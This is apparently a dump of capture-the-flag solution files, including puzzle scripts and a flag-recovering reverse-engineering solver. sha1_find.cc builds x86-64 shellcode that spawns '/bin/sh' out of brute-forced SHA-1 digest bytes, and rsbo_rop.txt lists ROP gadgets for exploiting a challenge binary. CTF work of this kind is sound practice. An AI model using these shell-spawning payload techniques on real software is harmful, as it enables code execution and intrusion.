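pneu.sub!('I', 'y') 7 | pneu.sub!('T', 'e') 8 | pneu.sub!('C', 'r') 9 | pneu.sub!('O', 'l') 10 | pneu.sub!('N', 'y') 11 | pneu.sub!('{', 'l') 12 | pneu.sub!('T', 'g') 13 | 14 | [ 15 | ['h', 14037, 't'], 16 | ['i', 15553, 'a'], 17 | # 18 | [' ', 18778, 'y'], 19 | # f 20 | ['l', 21917, 'r'], 21 | ['a', 23566, 's'], 22 | ['g', 25089, 'l'], 23 | [' ', 26650, 'l'], 24 | ['i', 28162, 'l'], 25 | ['s', 29721, 'l'], 26 | [' ', 31348, 'r'], 27 | ['l', 32939, 'a'], 28 | ['o', 34456, 't'], 29 | 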
# n 30 | # g 31 | # e 32 | # s 33 | # t 34 | # e 35 | # ??? psenyl 45710 s 36 | # t ttreonyl 37 | # e 38 | # s 39 | # t 40 | # e 41 | # s 42 | 43 | ].each do |c, i, r| 44 | if pneu[i] != c 45 | raise 46 | end 47 | pneu[i] = r 48 | end 49 | 50 | #pneu.sub!(' ', 'y') 51 | 52 | pneu.sub!('!', 'a') 53 | pneu.sub!('!', 'a') 54 | pneu.sub!('!', 'i') 55 | 56 | pneu.sub!('}', 't') 57 | 58 | copy = pneu.dup 59 | $rep = [] 60 | 61 | def repl(pneu, x) 62 | pneu.gsub!(x, '') 63 | $rep << x 64 | end 65 | 66 | def last(c) 67 | x = c.dup 68 | $rep.each do |r| 69 | x.gsub!(r, '_' * r.size) 70 | end 71 | puts x 72 | end 73 | 74 | repl(pneu, 'acetylseryl') 75 | #copy.gsub!('acetylseryl', '_') 76 | repl(pneu, 'glutaminyl') 77 | #copy.gsub!('glutaminyl', '_') 78 | repl(pneu, 'aspartyl') 79 | #copy.gsub!('aspartyl', '_') 80 | repl(pneu, 'iso') 81 | #copy.gsub!('iso', '_') 82 | #repl(pneu, 'isoleucyl') 83 | repl(pneu, 'tryptophyl') 84 | #copy.gsub!('tryptophyl', '_') 85 | 86 | while true 87 | prev = 0 88 | ps = 0 89 | 4.upto(99) do |l| 90 | s = pneu.scan(pneu[0, l]).size 91 | v = s * l 92 | if v < prev 93 | if s == 1 94 | puts pneu 95 | exit 96 | end 97 | 98 | if v < 40 99 | puts pneu 100 | #puts copy 101 | exit 102 | end 103 | 104 | l -= 1 105 | s = pneu.scan(pneu[0, l]).size 106 | v = s * l 107 | STDERR.puts "#{pneu[0, l]} #{l}*#{s}=#{v} #{pneu.size}" 108 | repl(pneu, pneu[0, l]) 109 | #copy.gsub!(pneu[0, l], '_') 110 | STDERR.puts "#{pneu[0,16]}..." 
111 | break 112 | end 113 | 114 | prev = v 115 | 116 | if l == 99 117 | puts pneu 118 | last(copy) 119 | #puts copy 120 | exit 121 | end 122 | end 123 | 124 | end 125 | 126 | # pneu.gsub!(/Methiony/i) 127 | # pneu.gsub!('lthreony') 128 | # pneu.gsub!('glutaminyl') 129 | # pneu.gsub!('larginyl') 130 | # pneu.gsub!('tyrosyl') 131 | # pneu.gsub!('glutamyl') 132 | # pneu.gsub!('seryl') 133 | # pneu.gsub!('leucyl') 134 | 135 | 136 | 137 | puts pneu 138 | exit 139 | 140 | m = {} 141 | pneu.chars.each do |c| 142 | m[c] = 0 if !m[c] 143 | m[c] += 1 144 | end 145 | 146 | m.sort_by{|x, y|-y}.each do |x, y| 147 | puts "#{x} #{y}" 148 | end 149 | 150 | puts pneu[10921 + 1500, 200] 151 | puts pneu[10921 + 3000, 400] 152 | 153 | -------------------------------------------------------------------------------- /mid.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | //#define SIZE_Q 4 7 | //#define PQ_NUM (99 / SIZE_Q) 8 | 9 | //#define SIZE_Q 5000 10 | #define SIZE_Q 400 11 | //#define SIZE_Q 100 12 | #define PQ_NUM (100000 / SIZE_Q) 13 | 14 | typedef long long LL; 15 | 16 | typedef struct { 17 | int fds[2]; 18 | int cnt; 19 | } PipeQ; 20 | 21 | //LL arr[SIZE_Q]; 22 | LL* arr; 23 | //LL arr[5000]; 24 | PipeQ* pq; 25 | 26 | void initPQ(PipeQ* q) { 27 | q->cnt = 0; 28 | pipe(q->fds); 29 | } 30 | 31 | LL popPQ(PipeQ* q) { 32 | if (q->cnt <= 0) { 33 | q->cnt = -1; 34 | return LLONG_MAX; 35 | } 36 | q->cnt--; 37 | LL r; 38 | read(q->fds[0], &r, sizeof(r)); 39 | return r; 40 | } 41 | 42 | int cmp(const void* xp, const void* yp) { 43 | LL x = *(LL*)xp; 44 | LL y = *(LL*)yp; 45 | if (x > y) 46 | return 1; 47 | if (x < y) 48 | return -1; 49 | return 0; 50 | } 51 | 52 | void flushPQ(PipeQ* q, int sz) { 53 | #if 1 54 | int i; 55 | qsort(arr, sz, 8, cmp); 56 | for (i = 0; i < sz; i++) { 57 | //printf("%lld\n", arr[i]); 58 | write(q->fds[1], &arr[i], sizeof(LL)); 59 | } 60 | q->cnt = sz; 61 | #else 62 
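| q->cnt = 0; 63 | #endif 64 | } 65 | 66 | int main() { 67 | int i, j, qi, pqi, qnum = 0; 68 | arr = malloc(SIZE_Q * sizeof(LL)); 69 | pq = malloc(PQ_NUM * sizeof(PipeQ)); 70 | 71 | memset(arr, 0, SIZE_Q * sizeof(LL)); /* arr is a pointer, so sizeof(arr) cleared only pointer-size bytes; clear the whole allocation */ 72 | 73 | for (i = 0; i < PQ_NUM; i++) { 74 | initPQ(&pq[i]); 75 | } 76 | 77 | int n; 78 | if (scanf("%d",&n) != 1 || n <= 0 || n > PQ_NUM * SIZE_Q) return 1; /* pq has PQ_NUM queues of SIZE_Q values each; a larger n indexes past pq, and n <= 0 leaves min_qi at -1 in the merge loop */ 79 | 80 | //sleep(1); 81 | 82 | int tot = 0; 83 | for(i = 0; i < n + 1; i++){ 84 | j = i % SIZE_Q; 85 | 86 | pqi = (i - 1) / SIZE_Q; 87 | qi = i / SIZE_Q; 88 | if (i && (i == n || pqi != qi)) { 89 | int sz = SIZE_Q; 90 | if (i == n && j) 91 | sz = j; 92 | qnum++; 93 | /* printf("come pqi=%d i=%d sz=%d arr[0]=%lld arr[-1]=%lld\n", */ 94 | /* pqi, i, sz, arr[0], arr[SIZE_Q-1]); */ 95 | flushPQ(&pq[pqi], sz); 96 | /* printf("come i=%d sz=%d arr[0]=%lld arr[-1]=%lld\n", */ 97 | /* i, sz, arr[0], arr[sz-1]); */ 98 | tot += sz; 99 | } 100 | 101 | if (i != n) { 102 | scanf("%lld", &arr[j]); 103 | } 104 | } 105 | 106 | //sleep(1); 107 | //printf("%lld\n", 1); return 0; 108 | 109 | //fprintf(stderr, "qnum=%d tot=%d\n", qnum, tot); 110 | //sleep(1); 111 | 112 | for (i = 0; i < qnum; i++) { 113 | arr[i] = popPQ(&pq[i]); 114 | } 115 | 116 | LL min_val; 117 | for (i = 0; i < n / 2 + 1; i++) { 118 | min_val = LLONG_MAX; 119 | int min_qi = -1; 120 | for (qi = 0; qi < qnum; qi++) { 121 | //if (arr[qi] != -1 && min_val >= arr[qi]) { 122 | //if (/*arr[qi] != -1 &&*/ min_val >= arr[qi]) { 123 | if (pq[qi].cnt >= 0 && min_val >= arr[qi]) { 124 | min_val = arr[qi]; 125 | min_qi = qi; 126 | } 127 | } 128 | 129 | //if (min_qi == -1) 130 | // abort(); 131 | 132 | #if 0 133 | printf("%lld %d (%lld vs %lld vs %lld vs %lld vs %lld vs %lld)\n", 134 | min_val, min_qi, 135 | arr[0], arr[1], arr[2], arr[3], arr[4], arr[5]); 136 | #endif 137 | arr[min_qi] = popPQ(&pq[min_qi]); 138 | #if 0 139 | printf("%lld %d (%lld vs %lld vs %lld vs %lld vs %lld vs %lld)\n", 140 | min_val, min_qi, 141 | arr[0], arr[1], arr[2], arr[3], arr[4], arr[5]); 142 | #endif 143 | } 144 | 145 | //if (min_val > 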
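700000) 146 | // sleep(1); 147 | 148 | #if 0 149 | if (min_val < 0) 150 | sleep(2); 151 | else if (min_val > 0) 152 | sleep(1); 153 | #endif 154 | 155 | printf("%lld", min_val); 156 | 157 | //sleep(1); 158 | return 0; 159 | } 160 |
--------------------------------------------------------------------------------
/sha1_find.cc:
--------------------------------------------------------------------------------
// NOTE(review): the header names and the template argument of `strs` were
// lost when this listing was extracted. They are restored here from how the
// code uses them (SHA1 -> <openssl/sha.h>, strs[i].c_str() -> vector<string>).
#include <stdio.h>

#include <openssl/sha.h>

#include <string>
#include <vector>

using namespace std;

// Byte triples to look for at digest offsets 17..19, i.e. the last three
// bytes of a SHA-1 digest. Each entry carries the disassembly line it was
// taken from; annotation-only lines have no entry. The list ends at the
// {0,0,0} sentinel, so no entry may start with a zero byte.
//
// Review note: matching 24 chosen bits of a digest costs about 2^24 hash
// evaluations per pattern. A digest computed over caller-controlled input is
// therefore caller-controlled data and must never end up where it can be
// interpreted as code.
unsigned char WANTED[][3] = {
  //   4004ca:       48 89 c8                mov    %rcx,%rax
  { 0x48,0x89,0xc8 },
  //   4004cd:       48 89 c6                mov    %rax,%rsi
  { 0x48,0x89,0xc6 },
  //   4004d0:       48 89 c2                mov    %rax,%rdx
  { 0x48,0x89,0xc2 },
  //   4004d3:       48 ff c2                inc    %rdx
  { 0x48,0xff,0xc2 },
  //   4004d6:       48 ff c2                inc    %rdx
  { 0x48,0xff,0xc2 },
  //   4004d9:       48 ff c2                inc    %rdx
  { 0x48,0xff,0xc2 },
  //   4004dc:       48 ff c2                inc    %rdx
  { 0x48,0xff,0xc2 },
  //   4004df:       48 ff c2                inc    %rdx
  { 0x48,0xff,0xc2 },
  //   4004e2:       48 ff c2                inc    %rdx
  { 0x48,0xff,0xc2 },
  //   4004e5:       48 ff c2                inc    %rdx
  { 0x48,0xff,0xc2 },
  //   4004e8:       48 ff c2                inc    %rdx
  { 0x48,0xff,0xc2 },
  //   4004eb:       48 ff c2                inc    %rdx
  { 0x48,0xff,0xc2 },
  //   4004ee:       48 ff c2                inc    %rdx
  { 0x48,0xff,0xc2 },
  //   4004f1:       48 ff c2                inc    %rdx
  { 0x48,0xff,0xc2 },
  //   4004f4:       48 ff c2                inc    %rdx
  { 0x48,0xff,0xc2 },
  //   4004f7:       48 ff c2                inc    %rdx
  { 0x48,0xff,0xc2 },
  //   4004fa:       48 ff c2                inc    %rdx
  { 0x48,0xff,0xc2 },
  //   4004fd:       48 ff c2                inc    %rdx
  { 0x48,0xff,0xc2 },
  //   400500:       48 ff c2                inc    %rdx
  { 0x48,0xff,0xc2 },
  //   400503:       48 89 10                mov    %rdx,(%rax)
  { 0x48,0x89,0x10 },
  //   400506:       48 83 c0 08             add    $0x8,%rax
  //   40050a:       48 31 d2                xor    %rdx,%rdx
  { 0x48,0x31,0xd2 },
  //   40050d:       48 89 10                mov    %rdx,(%rax)
  { 0x48,0x89,0x10 },
  //   400510:       48 83 c0 08             add    $0x8,%rax
  //   400514:       48 89 c7                mov    %rax,%rdi
  { 0x48,0x89,0xc7 },
  //   400517:       c6 00 2f                movb   $0x2f,(%rax)
  { 0xc6,0x00,0x2f },
  //   40051a:       48 ff c0                inc    %rax
  { 0x48,0xff,0xc0 },
  //   40051d:       c6 00 62                movb   $0x62,(%rax)
  { 0xc6,0x00,0x62 },
  //   400520:       48 ff c0                inc    %rax
  { 0x48,0xff,0xc0 },
  //   400523:       c6 00 69                movb   $0x69,(%rax)
  { 0xc6,0x00,0x69 },
  //   400526:       48 ff c0                inc    %rax
  { 0x48,0xff,0xc0 },
  //   400529:       c6 00 6e                movb   $0x6e,(%rax)
  { 0xc6,0x00,0x6e },
  //   40052c:       48 ff c0                inc    %rax
  { 0x48,0xff,0xc0 },
  //   40052f:       c6 00 2f                movb   $0x2f,(%rax)
  { 0xc6,0x00,0x2f },
  //   400532:       48 ff c0                inc    %rax
  { 0x48,0xff,0xc0 },
  //   400535:       c6 00 73                movb   $0x73,(%rax)
  { 0xc6,0x00,0x73 },
  //   400538:       48 ff c0                inc    %rax
  { 0x48,0xff,0xc0 },
  //   40053b:       c6 00 68                movb   $0x68,(%rax)
  { 0xc6,0x00,0x68 },
  //   40053e:       48 ff c0                inc    %rax
  { 0x48,0xff,0xc0 },
  //   400541:       c6 00 00                movb   $0x0,(%rax)
  { 0xc6,0x00,0x00 },
  //   400544:       48 ff c0                inc    %rax
  { 0x48,0xff,0xc0 },
  //   400547:       48 89 f2                mov    %rsi,%rdx
  { 0x48,0x89,0xf2 },
  //   40054a:       48 31 c0                xor    %rax,%rax
  { 0x48,0x31,0xc0 },
  { 0,0,0 }
};

// For every WANTED entry, finds a 16-character zero-padded decimal string
// whose SHA-1 digest ends in that entry's three bytes, then prints one string
// per entry, in table order, on stdout. Counters 0 .. 2^30-1 are tried in
// order; the search stops early once every entry has a match. An entry that
// never matched is printed as an empty line, and a warning goes to stderr.
int main() {
  // Count the entries in front of the {0,0,0} sentinel.
  int wn;
  for (wn = 0; WANTED[wn][0]; wn++) {}

  vector<string> strs(wn);
  // Track matches separately instead of zeroing WANTED[j][0], so the table
  // stays intact and read-only in practice.
  vector<bool> found(wn, false);

  char buf[99];
  unsigned char sha[SHA_DIGEST_LENGTH];
  int fn = 0;
  for (int i = 0; i < (1 << 30) && wn != fn; i++) {
    snprintf(buf, sizeof(buf), "%016d", i);
    SHA1((const unsigned char*)buf, 16, sha);

    for (int j = 0; j < wn; j++) {
      if (found[j])
        continue;
      const unsigned char* w = WANTED[j];
      // Duplicate table entries all match on the same counter value and so
      // share one string.
      if (w[0] == sha[17] && w[1] == sha[18] && w[2] == sha[19]) {
        found[j] = true;
        fn++;
        strs[j] = buf;
      }
    }
  }

  if (fn != wn)
    fprintf(stderr, "warning: only %d of %d patterns matched\n", fn, wn);

  for (int i = 0; i < wn; i++) {
    printf("%s\n", strs[i].c_str());
  }
}
--------------------------------------------------------------------------------
/rsbo_rop.txt: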
-------------------------------------------------------------------------------- 1 | Gadgets information 2 | ============================================================ 3 | 0x080488e3 : adc al, 0x41 ; ret 4 | 0x080484f0 : add al, 0x24 ; inc eax ; mov al, byte ptr [0xd0ff0804] ; leave ; ret 5 | 0x0804852d : add al, 0x24 ; inc eax ; mov al, byte ptr [0xd2ff0804] ; leave ; ret 6 | 0x080484f4 : add al, 8 ; call eax 7 | 0x08048531 : add al, 8 ; call edx 8 | 0x080484d8 : add al, 8 ; cmp eax, 6 ; ja 0x80484e7 ; ret 9 | 0x0804872f : add byte ptr [eax], al ; add byte ptr [eax], al ; leave ; ret 10 | 0x08048730 : add byte ptr [eax], al ; add cl, cl ; ret 11 | 0x080483c8 : add byte ptr [eax], al ; add esp, 8 ; pop ebx ; ret 12 | 0x08048731 : add byte ptr [eax], al ; leave ; ret 13 | 0x080488e0 : add cl, byte ptr [eax + 0xe] ; adc al, 0x41 ; ret 14 | 0x08048732 : add cl, cl ; ret 15 | 0x080488dc : add eax, 0x2300e4e ; dec eax ; push cs ; adc al, 0x41 ; ret 16 | 0x08048512 : add eax, edx ; sar eax, 1 ; jne 0x804851f ; ret 17 | 0x08048799 : add esp, 0x1c ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret 18 | 0x080483ca : add esp, 8 ; pop ebx ; ret 19 | 0x0804857a : and al, 0x10 ; lahf ; add al, 8 ; call eax 20 | 0x080484f1 : and al, 0x40 ; mov al, byte ptr [0xd0ff0804] ; leave ; ret 21 | 0x0804852e : and al, 0x40 ; mov al, byte ptr [0xd2ff0804] ; leave ; ret 22 | 0x0804852a : and al, 4 ; mov dword ptr [esp], 0x804a040 ; call edx 23 | 0x080481a4 : bound esi, dword ptr [edx + 0xfeb48422] ; ret 24 | 0x080483b0 : call 0x80484c6 25 | 0x080484f6 : call eax 26 | 0x08048533 : call edx 27 | 0x08048515 : clc ; jne 0x804851c ; ret 28 | 0x080484db : clc ; push es ; ja 0x80484e4 ; ret 29 | 0x080484da : cmp eax, 6 ; ja 0x80484e5 ; ret 30 | 0x080488e1 : dec eax ; push cs ; adc al, 0x41 ; ret 31 | 0x08048659 : dec ecx ; ret 32 | 0x080488dd : dec esi ; push cs ; xor byte ptr [edx], al ; dec eax ; push cs ; adc al, 0x41 ; ret 33 | 0x08048798 : fild word ptr [ebx + 0x5e5b1cc4] ; pop edi ; pop ebp ; 
ret 34 | 0x080484f2 : inc eax ; mov al, byte ptr [0xd0ff0804] ; leave ; ret 35 | 0x0804852f : inc eax ; mov al, byte ptr [0xd2ff0804] ; leave ; ret 36 | 0x080484d6 : inc eax ; mov al, byte ptr [0xf8830804] ; push es ; ja 0x80484e9 ; ret 37 | 0x080488e4 : inc ecx ; ret 38 | 0x080484dd : ja 0x80484e2 ; ret 39 | 0x08048883 : jmp dword ptr [ebx] 40 | 0x08048516 : jne 0x804851b ; ret 41 | 0x08048797 : jne 0x8048781 ; add esp, 0x1c ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret 42 | 0x0804857c : lahf ; add al, 8 ; call eax 43 | 0x080484f8 : leave ; ret 44 | 0x0804879a : les ebx, ptr [ebx + ebx*2] ; pop esi ; pop edi ; pop ebp ; ret 45 | 0x080483cb : les ecx, ptr [eax] ; pop ebx ; ret 46 | 0x080481a1 : loopne 0x804814a ; pop ds ; bound esi, dword ptr [edx + 0xfeb48422] ; ret 47 | 0x080481a8 : mov ah, -2 ; ret 48 | 0x080484f3 : mov al, byte ptr [0xd0ff0804] ; leave ; ret 49 | 0x08048530 : mov al, byte ptr [0xd2ff0804] ; leave ; ret 50 | 0x080484d7 : mov al, byte ptr [0xf8830804] ; push es ; ja 0x80484e8 ; ret 51 | 0x08048578 : mov dword ptr [esp], 0x8049f10 ; call eax 52 | 0x080484ef : mov dword ptr [esp], 0x804a040 ; call eax 53 | 0x0804852c : mov dword ptr [esp], 0x804a040 ; call edx 54 | 0x0804872e : mov eax, 0 ; leave ; ret 55 | 0x080484c0 : mov ebx, dword ptr [esp] ; ret 56 | 0x080484bf : nop ; mov ebx, dword ptr [esp] ; ret 57 | 0x080484bd : nop ; nop ; mov ebx, dword ptr [esp] ; ret 58 | 0x080484bb : nop ; nop ; nop ; mov ebx, dword ptr [esp] ; ret 59 | 0x080484f5 : or bh, bh ; ror cl, 1 ; ret 60 | 0x08048532 : or bh, bh ; ror cl, cl ; ret 61 | 0x080484d9 : or byte ptr [ebx + 0x17706f8], al ; ret 62 | 0x08048511 : pop ds ; add eax, edx ; sar eax, 1 ; jne 0x8048520 ; ret 63 | 0x080481a3 : pop ds ; bound esi, dword ptr [edx + 0xfeb48422] ; ret 64 | 0x0804879f : pop ebp ; ret 65 | 0x0804879c : pop ebx ; pop esi ; pop edi ; pop ebp ; ret 66 | 0x080483cd : pop ebx ; ret 67 | 0x0804879e : pop edi ; pop ebp ; ret 68 | 0x0804879d : pop esi ; pop edi ; pop ebp ; ret 69 | 
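0x080488e2 : push cs ; adc al, 0x41 ; ret 70 | 0x080488de : push cs ; xor byte ptr [edx], al ; dec eax ; push cs ; adc al, 0x41 ; ret 71 | 0x08048745 : push ebx ; call 0x80484c7 72 | 0x080484dc : push es ; ja 0x80484e3 ; ret 73 | 0x08048744 : push esi ; push ebx ; call 0x80484c8 74 | 0x08048513 : rcl cl ; clc ; jne 0x804851e ; ret 75 | 0x080481aa : ret 76 | 0x0804850e : ret -0x153f 77 | 0x08048608 : ret -0x2f77 78 | 0x080484f7 : ror cl, 1 ; ret 79 | 0x08048534 : ror cl, cl ; ret 80 | 0x080481a2 : sahf ; pop ds ; bound esi, dword ptr [edx + 0xfeb48422] ; ret 81 | 0x08048514 : sar eax, 1 ; jne 0x804851d ; ret 82 | 0x080484c1 : sbb al, 0x24 ; ret 83 | 0x0804879b : sbb al, 0x5b ; pop esi ; pop edi ; pop ebp ; ret 84 | 0x0804850f : shr edx, 0x1f ; add eax, edx ; sar eax, 1 ; jne 0x8048522 ; ret 85 | 0x080483ad : sub esp, 8 ; call 0x80484c9 86 | 0x080488df : xor byte ptr [edx], al ; dec eax ; push cs ; adc al, 0x41 ; ret 87 | 88 | Unique gadgets found: 84 89 |
--------------------------------------------------------------------------------
/hop_graph.cc:
--------------------------------------------------------------------------------
// NOTE(review): the header names and all template arguments were lost when
// this listing was extracted. They are restored here from how the code uses
// each container; the ones inside the disabled "#if 0" blocks are best-effort.
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

#include <map>
#include <queue>
#include <set>
#include <string>
#include <vector>

using namespace std;

typedef unsigned char byte;
const char* HOP = "hop-62fa7ade9a1fa9254361e69d70e7a7e3.exe";

// One occurrence of the dispatch pattern found by main(): its address and the
// two 16-bit immediates extracted from it.
struct Chain {
  size_t addr;
  int mul;
  int add;
};

// Work item of the (disabled) backward search at the end of main().
struct Ctx {
  int addr;
  string flag;
  //set<int> seen;
};

//const int GOAL = 0x4015b9;
const int GOAL = 0x43dbd2;
const int DEAD = 0x4015bf;

// File offset that main() seeks to before reading, and the address that
// buffer offset 0 is treated as. Presumably the .text file offset and its
// load address; the values are the ones hard-coded in the original.
const off_t TEXT_FILE_OFFSET = 0x400;
const size_t TEXT_VADDR = 0x401000;

// Breadth-first search over `nex` (node -> (byte, next node)).
//
// Returns true when GOAL can be reached from `addr` without expanding DEAD.
// On success, *out (if non-NULL) receives the bytes along the first path
// found. Calls abort() after printing the node and the path so far when a
// reached node has no outgoing edges in `nex`.
bool is_goal_reachable(int addr, multimap<int, pair<char, int>>& nex,
                       string* out = NULL) {
  if (addr == DEAD)
    return false;

  map<int, string> route;  // visited nodes, with the path that first reached each
  queue<pair<int, string>> q;
  q.push(make_pair(addr, string()));

  while (!q.empty()) {
    pair<int, string> p = q.front();
    q.pop();

    if (!route.insert(p).second)
      continue;

    int a = p.first;
    if (a == DEAD)
      continue;

    if (a == GOAL) {
      if (out)
        *out = p.second;
      return true;
    }

    // equal_range covers every edge of `a`; multimap::find may return any
    // element with the key, not necessarily the first one.
    auto range = nex.equal_range(a);
    if (range.first == range.second) {
      printf("%x %s\n", a, p.second.c_str());
      abort();
    }

    for (auto iter = range.first; iter != range.second; ++iter) {
      const pair<char, int>& e = iter->second;
      q.push(make_pair(e.second, p.second + e.first));
    }
  }
  return false;
}

// The 22-byte sequence main() scans for; -1 marks a byte that is not compared.
// The group labels are the ones the original comparison chain carried.
static const int DISPATCH_LEN = 22;
static const int DISPATCH[DISPATCH_LEN] = {
  0x58,                                   // first byte (unlabelled in the original)
  0x48, 0x69, 0xc0, -1, -1, 0x00, 0x00,   // imul; bytes 4..5 are `mul`
  0x8b, 0x84, 0x02, -1, -1, 0x00, 0x00,   // mov;  bytes 11..12 are `add`
  0x48, 0x98,                             // cltq
  0x48, 0x01, 0xc2,                       // add
  0xff, 0xe2,                             // jmp
};

// True when the DISPATCH_LEN bytes at `p` match DISPATCH.
static bool is_dispatch(const byte* p) {
  for (int k = 0; k < DISPATCH_LEN; k++) {
    if (DISPATCH[k] >= 0 && p[k] != DISPATCH[k])
      return false;
  }
  return true;
}

// Copies the int stored at byte offset `off` of `buf` into *out. Returns false
// when those bytes are not entirely inside the `len`-byte buffer.
static bool read_i32_at(const byte* buf, size_t len, size_t off, int* out) {
  if (off > len || len - off < sizeof(int))
    return false;
  memcpy(out, buf + off, sizeof(int));  // no alignment assumption
  return true;
}

// Reads text_size bytes of HOP starting at TEXT_FILE_OFFSET, records every
// occurrence of DISPATCH, and for each occurrence and each byte value b in
// {0, 32..126} adds the edge
//   addr -> addr + (int stored at addr + add + b * mul).
// It then follows the known prefix `fix` from 0x43a8fb and prints every next
// byte from which GOAL is still reachable.
//
// The input file is untrusted data: every offset derived from its bytes is
// bounds-checked before it is dereferenced.
int main() {
  const size_t text_size = 0x002c6510;
  // The extra 1000 zero bytes let the pattern scan look past the last offset.
  const size_t buf_len = text_size + 1000;

  int fd = open(HOP, O_RDONLY);
  if (fd < 0) {
    perror(HOP);
    return 1;
  }

  byte* text = (byte*)calloc(buf_len, 1);
  if (!text) {
    perror("calloc");
    close(fd);
    return 1;
  }

  if (lseek(fd, TEXT_FILE_OFFSET, SEEK_SET) < 0) {
    perror("lseek");
    close(fd);
    free(text);
    return 1;
  }

  // read() may return fewer bytes than asked for; keep going until EOF.
  size_t got = 0;
  while (got < text_size) {
    ssize_t n = read(fd, text + got, text_size - got);
    if (n < 0) {
      perror("read");
      close(fd);
      free(text);
      return 1;
    }
    if (n == 0)
      break;
    got += (size_t)n;
  }
  close(fd);
  if (got < text_size) {
    fprintf(stderr, "warning: short read (%zu of %zu bytes), rest is zero\n",
            got, text_size);
  }

  vector<Chain> chains;

  for (size_t i = 0; i < text_size; i++) {
    //printf("%zu %d\n", i, text[i]);
    if (!is_dispatch(text + i))
      continue;
    size_t addr = i + TEXT_VADDR;
    int mul = text[i+5] * 256 + text[i+4];
    int add = text[i+12] * 256 + text[i+11];
    printf("%zx %x %x\n", addr, mul, add);
    Chain ch = {addr, mul, add};
    chains.push_back(ch);
  }

  set<size_t> verts;
  multimap<int, pair<char, int>> nex;
  multimap<int, pair<char, int>> rev;
  map<int, map<char, int>> nex_map;

  for (size_t i = 0; i < chains.size(); i++) {
    const Chain& c = chains[i];
    for (int b = 0; b < 127; b++) {
      if (b < 32 && b > 0)
        continue;

      // Buffer offset of the table entry for byte b.
      size_t off = (c.addr - TEXT_VADDR) + (size_t)c.add +
                   (size_t)b * (size_t)c.mul;
      int rel;
      if (!read_i32_at(text, buf_len, off, &rel)) {
        // The original dereferenced this offset unchecked.
        fprintf(stderr, "warning: %zx byte %d: table entry out of range\n",
                c.addr, b);
        continue;
      }
      int go = (int)(c.addr + rel);
      //puts "#{b.chr} #{'%x'%edx} => #{'%x'%go}"
      printf("%c %zx => %x\n", b, c.addr, go);

      nex.insert(make_pair(c.addr, make_pair(b, go)));
      rev.insert(make_pair(go, make_pair(b, c.addr)));
      nex_map[c.addr][b] = go;
      verts.insert(c.addr);
    }
  }
  free(text);

  puts("===");

  map<int, string> route;
  queue<pair<int, string>> q;
  int addr = 0x43a8fb;
  string flag = "HITCON{";
  //q.push(make_pair(0x44f491, ""));
  //q.push(make_pair(0x43a8fb, "HITCON{"));

  //string fix = "COf Us@ HUBA 0f Us@ 5";
  //string fix = "CabS0f Us@ 5hr1n] 0f Us@ ";
  //string fix = "yAA 0f Us@+U=: 0fUs@ 5hr1n3";
  //string fix = "CH2(Us@ H@A: 0f Us@ 5hr1n";
  //string fix = "CHeih1t-Q@ 5hr1n";
  //string fix = "CapiS";
  //string fix = "Cap7urA";
  string fix = "Cap7u";
  for (size_t i = 0; i < fix.size(); i++) {
    addr = nex_map[addr][fix[i]];
    flag += fix[i];
  }

  const map<char, int>& out_edges = nex_map[addr];
  if (out_edges.empty())
    fprintf(stderr, "warning: no edges recorded for %x\n", addr);

  for (int b = 0; b < 127; b++) {
    if (b < 32 && b > 0)
      continue;

    // Look the edge up instead of default-inserting target 0 for a byte
    // that has none.
    map<char, int>::const_iterator hit = out_edges.find((char)b);
    if (hit == out_edges.end())
      continue;

    int a = hit->second;
    string s;
    if (is_goal_reachable(a, nex, &s)) {
      printf("%c %x => %x %c%s\n", b, addr, a, b, s.c_str());
    }
  }

#if 0
  string fix = "C";
  for (int i = 0; i < fix.size(); i++) {
    addr = nex_map[addr][fix[i]];
    flag += fix[i];
  }

  q.push(make_pair(addr, flag));

  while (!q.empty()) {
    auto p = q.front();
    q.pop();

    if (!route.insert(p).second)
      continue;

    int a = p.first;
    if (a == 0x4015bf)
      continue;

    auto found = nex.find(a);
    if (found == nex.end()) {
      printf("%x %s\n", a, p.second.c_str());
      return 0;
    }

    for (auto iter = found;
         iter != nex.end() && iter->first == a;
         ++iter) {
      auto e = iter->second;
      q.push(make_pair(e.second, p.second + e.first));
    }
  }
#endif

#if 0
  vector<int> addrs = { 0x44f491, "" };
  for (int i = 0; i < 40; i++) {
    set<int> naddrs;
    for (int a : addrs) {
      auto found = nex.find(a);
      if (found == nex.end())
        continue;
      //abort();

      for (auto iter = found;
           iter != nex.end() && iter->first == a;
           ++iter) {
        auto p = iter->second;
        printf("%x (%c)=> %x\n", a, p.first, p.second);
        naddrs.insert(p.second);
      }
    }

    addrs.clear();
    addrs.assign(naddrs.begin(), naddrs.end());
  }
#endif

#if 0
  vector<int> addrs = { 0x44f491 };
  //vector<int> addrs = { 0x43a8fb };
  for (int i = 0; i < 40; i++) {
    puts("---");
    printf("%d %zu\n", i, addrs.size());
    set<int> naddrs;
    for (int a : addrs) {
      auto found = nex.find(a);
      if (found == nex.end())
        continue;
      //abort();

      for (auto iter = found;
           iter != nex.end() && iter->first == a;
           ++iter) {
        auto p = iter->second;
        printf("%x (%c)=> %x\n", a, p.first, p.second);
        naddrs.insert(p.second);
      }
    }

    addrs.clear();
    addrs.assign(naddrs.begin(), naddrs.end());
  }
#endif

#if 0
  //const int goal = 0x4015b9;
  set<int> seen;

  queue<Ctx> q;
  q.push(Ctx({0x4015b9, ""}));
  //q.push(Ctx({0x43dbd2, ""}));
  //q.push(Ctx({0x403d07, ""}));

  while (!q.empty()) {
    Ctx c = q.front();
    q.pop();

    printf("%x %s\n", c.addr, c.flag.c_str());

    auto found = rev.find(c.addr);
    if (found == rev.end())
      continue;
    //return 0;
    for (auto iter = found;
         iter != rev.end() && iter->first == c.addr;
         ++iter) {
      auto p = iter->second;
      //printf("%c %d\n", p.first, p.first);
      int goal = p.second;
      //set<int> seen = c.seen;
      if (seen.insert(goal).second) {
        q.push(Ctx({goal, p.first + c.flag}));
      }
    }
  }

#endif
}
--------------------------------------------------------------------------------
/rsbo2.txt:
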